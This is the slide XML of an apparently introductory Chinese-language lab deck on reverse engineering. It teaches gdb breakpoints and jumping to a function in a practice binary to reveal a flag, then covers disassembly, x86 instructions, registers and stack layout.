            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>先 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 打開 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>findflag.out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8FA650D-DC9D-CD45-B135-9F5ADE72F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86" y="2654300"/>
            <a:ext cx="100711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81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43AE0E-7329-9140-93E8-FCD61B73F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隨便設定一個中斷點</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r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3AFDC2F-F7E9-B04F-9AA2-5FBB1F764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489" y="2261111"/>
            <a:ext cx="9413332" cy="1133442"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="415651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48A4B3-8279-C44F-A196-C27B88619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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 讓他到中斷點停止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A613AF5-AC57-984F-9FEB-E1E97625A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1396501"/>
            <a:ext cx="7990677" cy="5616766"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2164473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2C23D-D868-384F-8BE3-71E7DCD1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jump</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 到 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>fun</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 那個奇怪的 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>function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1FE8023-34F6-0B4D-AF5A-8BFED30D0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669517"/>
            <a:ext cx="8369300" cy="2082800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91D0F4F-49DB-E242-B98C-B5760889358C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="4058433"/>
            <a:ext cx="736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ＦＬＡＧ就跳出來了呢！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038B469-01C0-9446-98C1-6F12B02BB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4660900"/>
            <a:ext cx="59436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80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B3C583-45D9-7444-81D2-8E684EB54C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Lab2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DC4A50-0F11-DF44-AE0C-51A246933E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來觀察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function</a:t>
            </a:r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的組語在幹嘛吧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6358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C2E6490-0018-454F-8943-44ED1D416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827" y="1131994"/>
            <a:ext cx="7008222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98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1ECCEB-CC02-4742-8F83-B7FFADBA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gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> -q lab2.out</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
            </a:b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B10D748-15B6-2141-AA91-7571F676E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353705"/>
            <a:ext cx="8596312" cy="349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16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9335F2-9205-5E4D-91A3-090370896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微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>disassemble main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r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>disassemble </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
            </a:b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5B9BC28-6069-0343-B92A-3BB87434B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0E6D5E8-1D8C-2B44-9F38-A04318552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9118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27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E9C69F-1FE6-3B45-848F-2BEEE723B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今天上課檔案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2EE2C4-0812-5E4E-A5A4-29E099AA7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git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clone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github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>/123ojp/FCU_TA_107_Stu.git</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2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6DE715-8EC5-044A-AC29-BC87BDAF8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85" y="3092798"/>
            <a:ext cx="92964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73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1886011" y="1831894"/>
            <a:ext cx="8471439" cy="4274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2365602" y="2149584"/>
            <a:ext cx="1078196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7200" b="1" dirty="0"/>
              <a:t>mov    e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="7200" b="1" dirty="0"/>
              <a:t>cx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="7200" b="1" err="1"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="7200" b="1"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="7200" b="1" dirty="0"/>
              <a:t>0xA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="7200" b="1" dirty="0"/>
              <a:t>push   0x0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="7200" b="1" dirty="0"/>
              <a:t>pop     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="7200" b="1" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="7200" b="1" dirty="0"/>
              <a:t>     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860133" y="1831893"/>
            <a:ext cx="3019545" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200"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rgbClr val="F03B5E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817000" y="1208871"/>
            <a:ext cx="3088556" cy="6230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latin typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t>指令</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t>(opcode)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5052205" y="1208871"/>
            <a:ext cx="5434641" cy="6230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operand</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="28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5069457" y="1831893"/>
            <a:ext cx="5374254" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200"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rgbClr val="F03B5E"/>
              </a:solidFill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4D24FCB1-ECAF-E44E-BD4C-C295A7ADA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47" y="288988"/>
            <a:ext cx="8069914" cy="582135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微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>組合語言 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>(x86)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1521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1886009" y="1985261"/>
            <a:ext cx="8471439" cy="4274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2365602" y="2149584"/>
            <a:ext cx="1078196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7200" b="1" dirty="0"/>
              <a:t>mov    e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="7200" b="1" dirty="0"/>
              <a:t>cx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="7200" b="1" err="1"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="7200" b="1"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="7200" b="1" dirty="0"/>
              <a:t>0xA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="7200" b="1" dirty="0"/>
              <a:t>push   0x0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="7200" b="1" dirty="0"/>
              <a:t>pop     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="7200" b="1" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="7200" b="1" dirty="0"/>
              <a:t>     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860133" y="1831893"/>
            <a:ext cx="3019545" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200"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rgbClr val="F03B5E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817000" y="1208871"/>
            <a:ext cx="3088556" cy="6230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latin typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t>指令</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t>(opcode)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5052205" y="1208871"/>
            <a:ext cx="5434641" cy="6230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operand</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="28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5069457" y="1831893"/>
            <a:ext cx="5374254" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200"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rgbClr val="F03B5E"/>
              </a:solidFill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4D24FCB1-ECAF-E44E-BD4C-C295A7ADA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47" y="288988"/>
            <a:ext cx="8069914" cy="582135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微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>組合語言 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>(x86)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="正方形/長方形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E3071D9-EA11-CF46-8B1E-09A87E39106D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5216058" y="2091086"/>
            <a:ext cx="2140946" cy="1337914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rgbClr val="F03B5E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="正方形/長方形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D1371AC-807A-7E49-81B5-2E315113730C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4886456" y="270556"/>
            <a:ext cx="24705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Register</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP" alt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3" name="下矢印 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FBDF6AF-1F50-A241-9B14-9833AB229595}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5589793" y="1010750"/>
            <a:ext cx="1063872" cy="1051087"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent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2924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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BCB2964-E7FA-3C48-94F5-EF435F241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5769" y="1131994"/>
            <a:ext cx="6182338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65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6A1A67-2BCD-EA44-8AC4-BF2406161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暫存器（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Register</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW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E0F20B-3310-B24E-AF1A-22AE25D61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559486" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t>EAX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t> EBX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t> ECX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t>EDX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> 運算用暫存器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t>EIP(instruction pointer register)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> 放下一個指令位子的暫存器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t>EBP (base pointer)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> 的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t>base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t>pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t>ESP(stack pointer)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> 指向 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> 頂端 的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t>pointer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963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1886009" y="1985261"/>
            <a:ext cx="8471439" cy="4274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2365602" y="2149584"/>
            <a:ext cx="1078196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7200" b="1" dirty="0"/>
              <a:t>mov    e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="7200" b="1" dirty="0"/>
              <a:t>cx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="7200" b="1" err="1"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="7200" b="1"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="7200" b="1" dirty="0"/>
              <a:t>0xA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="7200" b="1" dirty="0"/>
              <a:t>push   0x0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="7200" b="1" dirty="0"/>
              <a:t>pop     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="7200" b="1" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="7200" b="1" dirty="0"/>
              <a:t>     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860133" y="1831893"/>
            <a:ext cx="3019545" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200"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rgbClr val="F03B5E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817000" y="1208871"/>
            <a:ext cx="3088556" cy="6230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latin typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t>指令</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t>(opcode)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5052205" y="1208871"/>
            <a:ext cx="5434641" cy="6230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operand</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="28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5069457" y="1831893"/>
            <a:ext cx="5374254" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200"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rgbClr val="F03B5E"/>
              </a:solidFill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4D24FCB1-ECAF-E44E-BD4C-C295A7ADA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47" y="288988"/>
            <a:ext cx="8069914" cy="582135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微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>組合語言</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="正方形/長方形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E3071D9-EA11-CF46-8B1E-09A87E39106D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2326753" y="3428999"/>
            <a:ext cx="5138917" cy="2034251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rgbClr val="F03B5E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="正方形/長方形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D1371AC-807A-7E49-81B5-2E315113730C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3541738" y="6025992"/>
            <a:ext cx="12292199" cy="796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Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" alt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操作指令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP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3" name="下矢印 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FBDF6AF-1F50-A241-9B14-9833AB229595}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="13850131">
            <a:off x="1184984" y="4988988"/>
            <a:ext cx="1063872" cy="1051087"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent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0598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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908000" y="2225331"/>
            <a:ext cx="8557701" cy="39090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4865854" y="2531553"/>
            <a:ext cx="2078966" cy="328977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477661" y="2419140"/>
            <a:ext cx="3393057" cy="750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951204" y="5021126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Data1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4231219" y="2366123"/>
            <a:ext cx="3506716" cy="246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951203" y="4475343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Data2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4951202" y="3962824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Data3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2911038" y="2617600"/>
            <a:ext cx="1719086" cy="42695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Address</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="16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881460" y="3920858"/>
            <a:ext cx="1734903" cy="4743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2863867" y="3908597"/>
            <a:ext cx="1727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0xbffffc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" b="1" dirty="0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30</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="直線コネクタ 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4540532" y="4179861"/>
            <a:ext cx="565297" cy="0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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5039313" y="2605164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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="正方形/長方形 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2889684" y="4985845"/>
            <a:ext cx="1734903" cy="4743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2925316" y="4971064"/>
            <a:ext cx="1687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0xbffffc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" b="1" dirty="0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38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2881459" y="4453056"/>
            <a:ext cx="1734903" cy="4743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2915957" y="4438867"/>
            <a:ext cx="1812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0xbffffc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" b="1" dirty="0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34</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="直線コネクタ 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4540531" y="4669698"/>
            <a:ext cx="565297" cy="0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4540531" y="5223434"/>
            <a:ext cx="565297" cy="0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下矢印 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7179733" y="2605165"/>
            <a:ext cx="317726" cy="3184533"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 1548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4" name="下矢印 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2313834" y="2614741"/>
            <a:ext cx="355937" cy="3228636"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 1000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9" name="標題 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6164992-7A51-AB4F-87E4-81045FD82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47" y="288988"/>
            <a:ext cx="8069914" cy="582135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Stack</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>由高</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>往低</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>長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6711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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3323328-FE8C-F642-9F87-F4A26FCE9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251" y="1147859"/>
            <a:ext cx="2983919" cy="4356086"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="圖片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FA97ACD-7DEC-2349-8E5D-1585C8394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786" b="55394"/>
          <a:stretch/>
        </p:blipFill>
